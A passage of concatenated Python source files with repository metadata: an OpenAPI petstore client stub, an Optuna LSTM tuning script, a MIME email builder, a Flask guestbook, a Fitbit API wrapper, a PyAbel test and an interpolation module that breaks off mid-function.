] | permissive | wsalembi/openapi-generator | cf76c5241e28956fc44a073d17a1ee14fd9aef85 | 035736f5c413bbdc8e70f840cc2e8ff32da9a5a8 | refs/heads/master | 2023-03-17T02:22:04.106748 | 2022-02-16T07:33:23 | 2022-02-16T07:33:23 | 227,096,278 | 0 | 0 | Apache-2.0 | 2023-03-13T17:02:23 | 2019-12-10T10:56:56 | Java | UTF-8 | Python | false | false | 6,531 | py | # coding: utf-8
"""
Generated by: https://openapi-generator.tech
"""
from dataclasses import dataclass
import re # noqa: F401
import sys # noqa: F401
import typing
import urllib3
from urllib3._collections import HTTPHeaderDict
from petstore_api import api_client, exceptions
import decimal # noqa: F401
from datetime import date, datetime # noqa: F401
from frozendict import frozendict # noqa: F401
from petstore_api.schemas import ( # noqa: F401
AnyTypeSchema,
ComposedSchema,
DictSchema,
ListSchema,
StrSchema,
IntSchema,
Int32Schema,
Int64Schema,
Float32Schema,
Float64Schema,
NumberSchema,
DateSchema,
DateTimeSchema,
DecimalSchema,
BoolSchema,
BinarySchema,
NoneSchema,
none_type,
InstantiationMetadata,
Unset,
unset,
ComposedBase,
ListBase,
DictBase,
NoneBase,
StrBase,
IntBase,
Int32Base,
Int64Base,
Float32Base,
Float64Base,
NumberBase,
DateBase,
DateTimeBase,
BoolBase,
BinaryBase,
Schema,
_SchemaValidator,
_SchemaTypeChecker,
_SchemaEnumMaker
)
# query params
# Schema aliases describing each query parameter's value type
RequiredStringGroupSchema = IntSchema
RequiredInt64GroupSchema = Int64Schema
StringGroupSchema = IntSchema
Int64GroupSchema = Int64Schema

# TypedDict views of the query string: required keys must always be present,
# optional keys may be omitted (total=False)
RequestRequiredQueryParams = typing.TypedDict(
    'RequestRequiredQueryParams',
    {
        'required_string_group': RequiredStringGroupSchema,
        'required_int64_group': RequiredInt64GroupSchema,
    }
)
RequestOptionalQueryParams = typing.TypedDict(
    'RequestOptionalQueryParams',
    {
        'string_group': StringGroupSchema,
        'int64_group': Int64GroupSchema,
    },
    total=False
)


class RequestQueryParams(RequestRequiredQueryParams, RequestOptionalQueryParams):
    """Combined (required + optional) query parameter dict for this operation."""
    pass


# Serialization descriptors: every query parameter uses form style with
# explode=True, as declared in the OpenAPI document
request_query_required_string_group = api_client.QueryParameter(
    name="required_string_group",
    style=api_client.ParameterStyle.FORM,
    schema=RequiredStringGroupSchema,
    required=True,
    explode=True,
)
request_query_required_int64_group = api_client.QueryParameter(
    name="required_int64_group",
    style=api_client.ParameterStyle.FORM,
    schema=RequiredInt64GroupSchema,
    required=True,
    explode=True,
)
request_query_string_group = api_client.QueryParameter(
    name="string_group",
    style=api_client.ParameterStyle.FORM,
    schema=StringGroupSchema,
    explode=True,
)
request_query_int64_group = api_client.QueryParameter(
    name="int64_group",
    style=api_client.ParameterStyle.FORM,
    schema=Int64GroupSchema,
    explode=True,
)
# header params
# Schema aliases for the boolean header parameters
RequiredBooleanGroupSchema = BoolSchema
BooleanGroupSchema = BoolSchema

# TypedDict views of the request headers (same required/optional split as
# the query parameters)
RequestRequiredHeaderParams = typing.TypedDict(
    'RequestRequiredHeaderParams',
    {
        'required_boolean_group': RequiredBooleanGroupSchema,
    }
)
RequestOptionalHeaderParams = typing.TypedDict(
    'RequestOptionalHeaderParams',
    {
        'boolean_group': BooleanGroupSchema,
    },
    total=False
)


class RequestHeaderParams(RequestRequiredHeaderParams, RequestOptionalHeaderParams):
    """Combined (required + optional) header parameter dict for this operation."""
    pass


# Header parameters are serialized with simple style
request_header_required_boolean_group = api_client.HeaderParameter(
    name="required_boolean_group",
    style=api_client.ParameterStyle.SIMPLE,
    schema=RequiredBooleanGroupSchema,
    required=True,
)
request_header_boolean_group = api_client.HeaderParameter(
    name="boolean_group",
    style=api_client.ParameterStyle.SIMPLE,
    schema=BooleanGroupSchema,
)
# Endpoint location, HTTP method, and the auth schemes this operation accepts
_path = '/fake'
_method = 'DELETE'
_auth = [
    'bearer_test',
]


@dataclass
class ApiResponseFor400(api_client.ApiResponse):
    # A 400 from this endpoint carries no deserializable body or headers
    response: urllib3.HTTPResponse
    body: Unset = unset
    headers: Unset = unset


_response_for_400 = api_client.OpenApiResponse(
    response_cls=ApiResponseFor400,
)
# Maps HTTP status code (as a string) to its response deserializer
_status_code_to_response = {
    '400': _response_for_400,
}
class GroupParameters(api_client.Api):
    """Generated API wrapper for DELETE /fake (test endpoint for grouped parameters)."""

    def group_parameters(
        self: api_client.Api,
        query_params: RequestQueryParams = frozendict(),
        header_params: RequestHeaderParams = frozendict(),
        stream: bool = False,
        timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None,
        skip_deserialization: bool = False,
    ) -> typing.Union[
        api_client.ApiResponseWithoutDeserialization
    ]:
        """
        Fake endpoint to test group parameters (optional)
        :param skip_deserialization: If true then api_response.response will be set but
            api_response.body and api_response.headers will not be deserialized into schema
            class instances
        """
        # Validate that the caller supplied all required keys with valid types
        self._verify_typed_dict_inputs(RequestQueryParams, query_params)
        self._verify_typed_dict_inputs(RequestHeaderParams, header_params)

        # Serialize each known query parameter the caller actually provided
        _query_params = []
        for parameter in (
            request_query_required_string_group,
            request_query_required_int64_group,
            request_query_string_group,
            request_query_int64_group,
        ):
            parameter_data = query_params.get(parameter.name, unset)
            if parameter_data is unset:
                continue
            serialized_data = parameter.serialize(parameter_data)
            _query_params.extend(serialized_data)

        # Serialize the header parameters the same way
        _headers = HTTPHeaderDict()
        for parameter in (
            request_header_required_boolean_group,
            request_header_boolean_group,
        ):
            parameter_data = header_params.get(parameter.name, unset)
            if parameter_data is unset:
                continue
            serialized_data = parameter.serialize(parameter_data)
            _headers.extend(serialized_data)
        # TODO add cookie handling

        response = self.api_client.call_api(
            resource_path=_path,
            method=_method,
            query_params=tuple(_query_params),
            headers=_headers,
            auth_settings=_auth,
            stream=stream,
            timeout=timeout,
        )

        if skip_deserialization:
            api_response = api_client.ApiResponseWithoutDeserialization(response=response)
        else:
            # Deserialize according to the documented status code, if known
            response_for_status = _status_code_to_response.get(str(response.status))
            if response_for_status:
                api_response = response_for_status.deserialize(response, self.api_client.configuration)
            else:
                api_response = api_client.ApiResponseWithoutDeserialization(response=response)

        # Non-2xx responses are raised as exceptions with the parsed response attached
        if not 200 <= response.status <= 299:
            raise exceptions.ApiException(api_response=api_response)

        return api_response
| [
"noreply@github.com"
] | noreply@github.com |
d6d93d1c2677289dd9d3a9dc675e7e0a2d8b2862 | 6d49e92a553de6bcf07a308e15985ad600fcc367 | /hyperparam_optim.py | 813616bd8d25969c1b46f9659ad9fee4303fedaa | [] | no_license | nurahmadi/Audio-Classification-Using-Deep-Learning | 3e17462a7b7dc8e1e4e2165f9d6f2d27d1aa05dd | ad2dc8db8f00b597659c5d39fc1cfe55b79cadab | refs/heads/master | 2022-08-20T09:34:02.802485 | 2020-05-25T21:25:55 | 2020-05-25T21:25:55 | 266,879,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,744 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 18 21:46:40 2020
@author: na5815
"""
import numpy as np
import os
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dropout, Dense
from tensorflow.keras.optimizers import RMSprop
import h5py
import pickle
import optuna
from optuna.integration import TFKerasPruningCallback
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d.axes3d import Axes3D
from plotting import customise_scatter, legend_idx, plot_legend
num_labels = 10          # number of output classes
feature_dir = 'features'
result_dir = 'results'
feature = 'mfcc' #['mel','mfcc']
model_type = 'lstm' # ['cnn','lstm']

# Loading feature from training, validation, and testing sets
train_file = os.path.join(feature_dir,'mel_mfcc_train.h5')
print ("Loading feature from file: "+train_file)
with h5py.File(train_file,'r') as f:
    x_train = f[feature+'_train'][()]
    y_train = f['y_train'][()]

valid_file = os.path.join(feature_dir,'mel_mfcc_valid.h5')
print ("Loading feature from file: "+valid_file)
with h5py.File(valid_file,'r') as f:
    x_valid = f[feature+'_valid'][()]
    y_valid = f['y_valid'][()]

# Shape fed to the LSTM input layer.
# NOTE(review): assumes x_train is (samples, time_steps, features) — confirm upstream.
input_shape = (x_train.shape[1], x_train.shape[2])
def objective(trial):
    """Optuna objective: train one LSTM with sampled hyperparameters and
    return its validation accuracy (the study maximizes this value)."""
    # Sample the search space (suggest-call order preserved for reproducibility)
    n_units = trial.suggest_int("units", 25, 250)
    drop_rate = trial.suggest_categorical("dropout", [0, 0.1, 0.2, 0.3, 0.4])
    n_batch = trial.suggest_categorical("batch_size", [32, 64, 96, 128])
    n_epochs = trial.suggest_int("epochs", 5, 30)
    learn_rate = trial.suggest_loguniform("lr", 1e-5, 1e-1)

    net = Sequential()
    net.add(LSTM(units=n_units,
                 input_shape=input_shape,
                 dropout=drop_rate))
    net.add(Dense(num_labels, activation='softmax'))
    net.compile(loss='categorical_crossentropy',
                optimizer=RMSprop(lr=learn_rate),
                metrics=['accuracy'])

    # Prune unpromising trials early based on validation loss
    net.fit(x_train, y_train,
            batch_size=n_batch, epochs=n_epochs, verbose=0,
            validation_data=(x_valid, y_valid),
            callbacks=[TFKerasPruningCallback(trial, 'val_loss')])

    # evaluate() returns [loss, accuracy]; report accuracy on the validation set
    val_loss, val_accuracy = net.evaluate(x_valid, y_valid, batch_size=n_batch, verbose=0)
    return val_accuracy
# Maximize validation accuracy; cap the search at 100 trials or 6 hours
study = optuna.create_study(direction="maximize")
study.optimize(objective, n_trials=100, timeout=21600)

print("Number of finished trials: {}".format(len(study.trials)))
df_trial = study.trials_dataframe(attrs=('number', 'value', 'params', 'state'))
print(df_trial)

# Persist the full trial history as CSV
trial_file = os.path.join(result_dir,feature+'_'+model_type+'_trial.csv')
print ("Storing trial into a file: "+trial_file)
df_trial.to_csv(trial_file)

print("Best trial:")
best_trial = study.best_trial
print(" Value: {}".format(best_trial.value))
print(" Params: ")
for key, value in best_trial.params.items():
    print(" {}: {}".format(key, value))

# Pickle the best trial object for later inspection
best_trial_file = os.path.join(result_dir,feature+'_'+model_type+'_best_trial.pkl')
print ("Storing best trial into a file: "+best_trial_file)
with open(best_trial_file, 'wb') as f:
    pickle.dump(best_trial, f)
# Open and plot the hyperparameter optimisation results
trial_file = os.path.join(result_dir,feature+'_'+model_type+'_trial.csv')
print ("Loading trial from a file: "+trial_file)
df_trial = pd.read_csv(trial_file,index_col=0)

dropout_space = [0, 0.1, 0.2, 0.3, 0.4]
params_units = df_trial['params_units'].to_numpy()
params_epochs = df_trial['params_epochs'].to_numpy()
params_batch_size = df_trial['params_batch_size'].to_numpy()
params_dropout = df_trial['params_dropout'].to_numpy()
params_lr = df_trial['params_lr'].to_numpy()
accuracy = df_trial['value'].to_numpy()

label = ['Units','Epochs','Batch Size','Dropout Rate','Learning Rate']
hyperparam = [params_units, params_epochs,params_batch_size,params_dropout,params_lr]
num_hyperparam = len(hyperparam)
color = cm.gist_rainbow(np.linspace(0.,1.,num_hyperparam))

# Split the trials by batch size; one 3D subplot per batch-size value
batch_idx_32 = np.where(params_batch_size==32)[0]
batch_idx_64 = np.where(params_batch_size==64)[0]
batch_idx_96 = np.where(params_batch_size==96)[0]
batch_idx_128 = np.where(params_batch_size==128)[0]
batch_idx = [batch_idx_32, batch_idx_64, batch_idx_96, batch_idx_128]

cbarlabel = 'Accuracy'
# Marker size encodes dropout rate; colour encodes accuracy
dropout_size = params_dropout*100 + 20
cmap = 'cool'

fig = plt.figure(figsize=(14,4))
plt.subplots_adjust(wspace=0)
ax0 = fig.add_subplot(1,4,1,projection='3d')
scat = ax0.scatter3D(params_units[batch_idx[0]],params_epochs[batch_idx[0]],params_lr[batch_idx[0]],c=accuracy[batch_idx[0]],
                     s=dropout_size[batch_idx[0]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax0,xlabel='Units',ylabel='Epochs',zlabel='')
ax1 = fig.add_subplot(1,4,2,projection='3d')
scat = ax1.scatter3D(params_units[batch_idx[1]],params_epochs[batch_idx[1]],params_lr[batch_idx[1]],c=accuracy[batch_idx[1]],
                     s=dropout_size[batch_idx[1]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax1,xlabel='Units',ylabel='Epochs',zlabel='')
ax2 = fig.add_subplot(1,4,3,projection='3d')
scat = ax2.scatter3D(params_units[batch_idx[2]],params_epochs[batch_idx[2]],params_lr[batch_idx[2]],c=accuracy[batch_idx[2]],
                     s=dropout_size[batch_idx[2]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax2,xlabel='Units',ylabel='Epochs',zlabel='')
ax3 = fig.add_subplot(1,4,4,projection='3d')
scat = ax3.scatter3D(params_units[batch_idx[3]],params_epochs[batch_idx[3]],params_lr[batch_idx[3]],c=accuracy[batch_idx[3]],
                     s=dropout_size[batch_idx[3]],cmap=cmap,vmin=0, vmax=1)
customise_scatter(ax3,xlabel='Units',ylabel='Epochs',zlabel='')
ax3.text(325,32,0.00075,'Learn Rate',zdir='z',fontsize=12,rotation=0,va='bottom',ha='left')
#ax2.zaxis.set_label_coords(0,0)

# One legend entry per distinct dropout value (marker-size key)
leg_idx = legend_idx(params_dropout,dropout_space)
for i in range(len(leg_idx)):
    ax1.scatter3D(params_units[leg_idx[i]],params_epochs[leg_idx[i]],params_lr[leg_idx[i]],c=np.array([accuracy[leg_idx[i]]]),
                  s=dropout_size[leg_idx[i]],cmap=cmap,vmin=0, vmax=1, label=str(dropout_space[i]))
plot_legend(ax1,leg_idx)

# Shared colorbar on the right edge of the figure
cbax = fig.add_axes([0.94, 0.2, 0.01, 0.55])
cbar = fig.colorbar(scat,cax=cbax)
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom",fontsize=12)

# Annotate each subplot with its batch size
axes = [ax0, ax1, ax2, ax3]
ax_idx = ['batch 32','batch 64','batch 96','batch 128']
x = [250,250,250,250]
y = [0,0,0,5]
z = [-0.015,-0.01,-0.025,-0.002]
for i in range(4):
    axes[i].text(x[i], y[i], z[i], ax_idx[i], fontsize=12,fontweight='bold', va='top')
| [
"noreply@github.com"
] | noreply@github.com |
0e00d7b9dfd12f62cf14341e65cd37786e0b1482 | f687b45b061a0a4ed849d5d56e265a3423c95f56 | /mime_gen_both.py | 9f8121e8b8ff5edba0344a98ab758923591037af | [] | no_license | wwwlwscom/python | 45e52529fffccf161a0cff8aaf2d19a149ac2056 | 5478329f068f9a4eff5c07eee8005318b41b6440 | refs/heads/master | 2021-01-20T10:06:17.251976 | 2015-10-20T20:03:34 | 2015-10-20T20:03:34 | 41,769,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | #!/usr/bin/env python
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email import Utils, Encoders
import mimetypes, sys
def genpart(data, contenttype):
    """Wrap raw data in a MIME part matching *contenttype*.

    text/* parts become MIMEText; anything else is carried as a
    base64-encoded MIMEBase payload.
    """
    maintype, subtype = contenttype.split('/')
    if maintype != 'text':
        part = MIMEBase(maintype, subtype)
        part.set_payload(data)
        Encoders.encode_base64(part)
        return part
    return MIMEText(data, _subtype=subtype)
def attachment(filename):
    """Build a MIME part for *filename* flagged as an attachment.

    Falls back to application/octet-stream when the content type cannot
    be guessed or the file appears to be compressed/encoded on disk.
    """
    mimetype, mimeencoding = mimetypes.guess_type(filename)
    if mimeencoding or (mimetype is None):
        mimetype = 'application/octet-stream'
    # 'with' guarantees the file handle is closed even if genpart raises
    # (the original leaked the handle on any exception between open and close)
    with open(filename, 'rb') as fd:
        retval = genpart(fd.read(), mimetype)
    retval.add_header('Content-Disposition', 'attachment', filename = filename)
    return retval
# Plain-text and HTML versions of the same message body; the recipient's
# client renders whichever multipart/alternative it prefers
message = """Hello,
This is a test message from Rock. I hope you enjoy it!
--Anonymous"""
messagehtml = """Hello,<P>
This is a <B>great</B>test message from Rock. I hope you enjoy it!<P>
--<I>Anonymous<I>"""

# Top-level multipart container with the standard RFC 2822 headers
msg = MIMEMultipart()
msg['To'] = 'recipient@example.com'
msg['From'] = 'Test Sender <sender@example.com>'
msg['Subject'] = 'Test Message, Rock'
msg['Date'] = Utils.formatdate(localtime = 1)
msg['Message-ID'] = Utils.make_msgid()

# multipart/alternative: plain text first, HTML last (last = most preferred)
body = MIMEMultipart('alternative')
body.attach(genpart(message, 'text/plain'))
body.attach(genpart(messagehtml, 'text/html'))
msg.attach(body)

# Each command line argument is attached as a file
for filename in sys.argv[1:]:
    msg.attach(attachment(filename))

print msg.as_string()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
9e304994375f0455b78a9d29d08791808a9cccc8 | 6b77fc3e8a2b919483723c02ab47681f6c487caa | /main.py | 30ccf696cee9f3e806a1491e43f53d4984ec88ab | [] | no_license | kazato110tm/gcp_python_app | 1d94482eda88e176364ceb6d1d6be39676780df5 | 1a5a2ea65ad82da8a7261d84908faa136fb067d3 | refs/heads/master | 2022-12-06T21:53:56.408582 | 2020-08-23T16:01:10 | 2020-08-23T16:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START app]
import logging
from flask import Flask, redirect, request, render_template
from google.appengine.ext import ndb
class Message(ndb.Model):
    """A guestbook message stored in Cloud Datastore."""
    body = ndb.StringProperty()  # message text submitted by the user
    created = ndb.DateTimeProperty(auto_now_add=True)  # set automatically on first put()
# WSGI application instance served by App Engine
app = Flask(__name__)
@app.route('/')
def hello():
    """Render the home page listing every stored message."""
    stored = Message.query().fetch()
    return render_template('hello.html', messages=stored)
@app.route('/add', methods=['POST'])
def add_message():
    """Persist the posted 'message' form field, then redirect home."""
    body_text = request.form.get('message', '')
    Message(body=body_text).put()
    return redirect('/')
@app.errorhandler(500)
def server_error(e):
    """Log the failure (with traceback) and return a generic 500 page."""
    # Log the error and stacktrace.
    logging.exception('An error occurred during a request.')
    return 'An internal error occurred.', 500
# [END app]
| [
"deguchi.k.110@gmail.com"
] | deguchi.k.110@gmail.com |
c63fff8d99a3dc4b7fc547ac13a5fde5ce61b21f | 8a25ada37271acd5ea96d4a4e4e57f81bec221ac | /home/pi/GrovePi/Software/Python/others/temboo/Library/Fitbit/Social/CreateInvite.py | ad0fa7c6517b0cc3e0e04b248b8071b8d35346b8 | [
"MIT",
"Apache-2.0"
] | permissive | lupyuen/RaspberryPiImage | 65cebead6a480c772ed7f0c4d0d4e08572860f08 | 664e8a74b4628d710feab5582ef59b344b9ffddd | refs/heads/master | 2021-01-20T02:12:27.897902 | 2016-11-17T17:32:30 | 2016-11-17T17:32:30 | 42,438,362 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 5,095 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# CreateInvite
# Invites a user to become friends with authorized user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class CreateInvite(Choreography):
    """Choreo wrapper: invites a user to become friends with the authorized user."""

    def __init__(self, temboo_session):
        """
        Create a new instance of the CreateInvite Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(CreateInvite, self).__init__(temboo_session, '/Library/Fitbit/Social/CreateInvite')

    def new_input_set(self):
        # Factory for the input container used when executing this Choreo
        return CreateInviteInputSet()

    def _make_result_set(self, result, path):
        # Wrap raw execution results in the Choreo-specific ResultSet
        return CreateInviteResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Track an asynchronous execution of this Choreo
        return CreateInviteChoreographyExecution(session, exec_id, path)
class CreateInviteInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the CreateInvite
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """

    def set_AccessTokenSecret(self, value):
        """
        Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process.)
        """
        super(CreateInviteInputSet, self)._set_input('AccessTokenSecret', value)

    def set_AccessToken(self, value):
        """
        Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
        """
        super(CreateInviteInputSet, self)._set_input('AccessToken', value)

    def set_ConsumerKey(self, value):
        """
        Set the value of the ConsumerKey input for this Choreo. ((required, string) The Consumer Key provided by Fitbit.)
        """
        super(CreateInviteInputSet, self)._set_input('ConsumerKey', value)

    def set_ConsumerSecret(self, value):
        """
        Set the value of the ConsumerSecret input for this Choreo. ((required, string) The Consumer Secret provided by Fitbit.)
        """
        super(CreateInviteInputSet, self)._set_input('ConsumerSecret', value)

    def set_InvitedUserEmail(self, value):
        """
        Set the value of the InvitedUserEmail input for this Choreo. ((conditional, string) The email address of the user to invite; user can be a Fitbit member already. Required unless providing the InvitedUserID.)
        """
        super(CreateInviteInputSet, self)._set_input('InvitedUserEmail', value)

    def set_InvitedUserID(self, value):
        """
        Set the value of the InvitedUserID input for this Choreo. ((conditional, string) The Fitbit user id of the user to send an invite to. Required unless providing the InvitedUserEmail.)
        """
        super(CreateInviteInputSet, self)._set_input('InvitedUserID', value)

    def set_ResponseFormat(self, value):
        """
        Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that you want the response to be in: xml or json. Defaults to json.)
        """
        super(CreateInviteInputSet, self)._set_input('ResponseFormat', value)

    def set_UserID(self, value):
        """
        Set the value of the UserID input for this Choreo. ((optional, string) The user's encoded id. Defaults to "-" (dash) which will return data for the user associated with the token credentials provided.)
        """
        super(CreateInviteInputSet, self)._set_input('UserID', value)
class CreateInviteResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the CreateInvite Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        """Parse a JSON response body (note: parameter name shadows the builtin `str`)."""
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from Fitbit.)
        """
        return self._output.get('Response', None)
class CreateInviteChoreographyExecution(ChoreographyExecution):
    """Execution handle returned when CreateInvite is run asynchronously."""
    def _make_result_set(self, response, path):
        # Produce the same typed result set used for synchronous execution.
        return CreateInviteResultSet(response, path)
| [
"lupyuen@gmail.com"
] | lupyuen@gmail.com |
67ffd9c692b0207ce65232a7eec862d400e10e60 | 89be3dbe4973f65b17a98780f5b0edce2b3634b0 | /abel/tests/test_tools_center.py | 3bd695c474f386df2c5535e1cf57a56305d97a9f | [
"MIT"
] | permissive | Yarubaobei/PyAbel | 0b53daf496dbc0e88547d166267285d72306c702 | 8c881b59a36ed5bd8ad841e38dc942c23c0ff112 | refs/heads/master | 2020-05-19T05:40:47.176636 | 2019-05-04T05:24:20 | 2019-05-04T05:24:20 | 184,854,479 | 0 | 0 | MIT | 2019-05-04T05:06:37 | 2019-05-04T05:06:37 | null | UTF-8 | Python | false | false | 1,792 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from numpy.testing import assert_allclose
import abel
from scipy.ndimage.interpolation import shift
def test_center_image():
    """End-to-end check of abel.tools.center: center finding with the 'slice'
    and 'com' methods, single-axis re-centering, and odd-size enforcement,
    using the shifted Dribinski sample image."""
    # BASEX sample image, Gaussians at 10, 15, 20, 70,85, 100, 145, 150, 155
    # image width, height n = 361, center = (180, 180)
    IM = abel.tools.analytical.SampleImage(n=361, name="dribinski").image
    # artificially displace center, now at (179, 182)
    IMx = shift(IM, (-1, 2))
    true_center = (179, 182)
    # find_center using 'slice' method
    center = abel.tools.center.find_center(IMx, center="slice")
    assert_allclose(center, true_center, atol=1)
    # find_center using 'com' method
    center = abel.tools.center.find_center(IMx, center="com")
    assert_allclose(center, true_center, atol=1)
    # check single axis - vertical
    # center shifted image IMx in the vertical direction only
    IMc = abel.tools.center.center_image(IMx, center="com", axes=1)
    # determine the center
    center = abel.tools.center.find_center(IMc, center="com")
    assert_allclose(center, (179, 180), atol=1)
    # check single axis - horizontal
    # center shifted image IMx in the horizontal direction only
    IMc = abel.tools.center.center_image(IMx, center="com", axes=0)
    center = abel.tools.center.find_center(IMc, center="com")
    assert_allclose(center, (180, 182), atol=1)
    # check even image size returns odd
    # drop off one column, to make an even column image
    IM = IM[:, :-1]
    m, n = IM.shape
    # centering with odd_size=True should shave one more column off (n is now even)
    IMy = abel.tools.center.center_image(IM, center="slice", odd_size=True)
    assert_allclose(IMy.shape, (m, n-1))
if __name__ == "__main__":
    test_center_image()
| [
"Stephen.Gibson@anu.edu.au"
] | Stephen.Gibson@anu.edu.au |
002330b328f74d714aa97ba917e8782c833ab8da | 92c7311a8c145b2d415901991a459bf7d2734929 | /src/web/Result.py | d6cac504f8c02f8e040af32d4e04cdcf39c4d2b1 | [] | no_license | liuyanglxh/py-web | 3aa1043b672a034d548bce7042c8e0cf8faa24b2 | 441ed2077faeabf38f1449762a6ce692bb6a1115 | refs/heads/master | 2022-11-20T15:37:39.612580 | 2020-05-29T10:41:32 | 2020-05-29T10:41:32 | 267,832,787 | 0 | 0 | null | 2022-11-17T15:08:32 | 2020-05-29T10:40:30 | Python | UTF-8 | Python | false | false | 349 | py | from flask import json
class Result(object):
    """Simple API response envelope: a success flag, a payload, and a status code."""

    def __init__(self, success=True, data=None, code=200):
        # Defaults mirror the former class-level attributes (True / None / 200),
        # but live here so they are plain per-instance values instead of
        # class attributes that every instance immediately shadowed.
        self.success = success
        self.data = data
        self.code = code
# Module-level smoke test (Python 2 print statement): serialize a sample
# Result to pretty-printed JSON via each object's __dict__.
r = Result(True, "a", 200)
print json.dumps(r, default=lambda o: o.__dict__, sort_keys=True, indent=4, ensure_ascii=False)
| [
"yang.liu@mail.dealmoon.com"
] | yang.liu@mail.dealmoon.com |
7c6fc5bd03e1385e6cf3dcf99c83d1f366d599fb | ce72b098359697eb28628848ec13f736f29366fa | /10-11_like_number_1.py | 1d4d7fef40c7c08b8efc1dad28a2b51c1358d64c | [] | no_license | TCmatj/learnpython | 1e9ab09deebda025ee4cdd1a465815fcd0594f48 | d92b38a760b29f26efba1f4770ab822aba454931 | refs/heads/master | 2023-01-31T18:19:56.211173 | 2020-12-14T03:06:35 | 2020-12-14T03:06:35 | 298,828,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # TC 2020/10/11/21:39
import json
# Prompt the user for a favourite number (prompt text is Chinese:
# "enter your favourite number") and persist it as JSON.
# NOTE(review): int() raises ValueError on non-numeric input — unhandled here.
filename = 'json\\like_number.json'
number = int(input("输入喜欢的数字:"))
with open(filename,'w') as fm:
    json.dump(number,fm)
"2216685752@qq.com"
] | 2216685752@qq.com |
76b298420595288e18d020473760727475db4570 | 3e6d90546509004d836b4a74df93c9d1515529a0 | /Interpolazione.py | 6e7821a583fda9e05fe5c8f0f525372fc9047150 | [] | no_license | pelagos91/UniBa-Calcolo-Numerico-ICD | 8a05438837a17ffe13ddc684ef187b340ac8f21a | 969c3deeaf184c81df956756b7157b398944a28c | refs/heads/master | 2021-01-10T05:32:48.845826 | 2016-01-26T22:25:41 | 2016-01-26T22:25:41 | 50,463,061 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,269 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 13 09:25:54 2015
@author: pelag
"""
import numpy as np
import scipy.linalg as las
import matplotlib.pylab as plt
import scipy.interpolate as interpolate
def lagrange(xnodi, fnodi, x):
    """
    Evaluate the Lagrange-form interpolating polynomial and the
    Lebesgue function on a set of points.

    y, L = lagrange(xnodi, fnodi, x)

    Input:
        xnodi  interpolation nodes
        fnodi  function values at the nodes
        x      evaluation points

    Output:
        y      values of the interpolating polynomial at x
        L      values of the Lebesgue function at x
    """
    n = xnodi.shape[0]
    m = x.shape[0]
    basis = np.zeros((n, m))
    for i in range(n):
        # Indices of every node except the i-th one.
        others = np.concatenate((np.arange(0, i), np.arange(i + 1, n)))
        den = np.prod(xnodi[i] - xnodi[others])
        for j in range(m):
            basis[i, j] = np.prod(x[j] - xnodi[others]) / den
    # Interpolant: sum_i fnodi[i] * l_i(x)
    y = np.sum(np.dot(np.diag(fnodi), basis), axis=0)
    # Lebesgue function: sum_i |l_i(x)|
    L = np.sum(np.abs(basis), axis=0)
    return y, L
def potenze(xnodi, fnodi, xx):
    """
    Evaluate the interpolating polynomial in the monomial (power) basis.

    f, condA = potenze(xnodi, fnodi, xx)

    Input:
        xnodi  interpolation nodes
        fnodi  function values at the nodes
        xx     evaluation points

    Output:
        f      values of the interpolating polynomial at xx
        condA  infinity-norm condition number of the Vandermonde matrix
    """
    n = xnodi.shape[0]
    # Vandermonde matrix: column j holds xnodi**j.
    vander = np.zeros((n, n))
    for col in range(n):
        vander[:, col] = xnodi ** col
    coeffs = las.solve(vander, fnodi)
    # np.polyval expects coefficients ordered from the highest power down.
    f = np.polyval(coeffs[::-1], xx)
    condA = np.linalg.cond(vander, np.inf)
    return f, condA
def cheby(a, b, n):
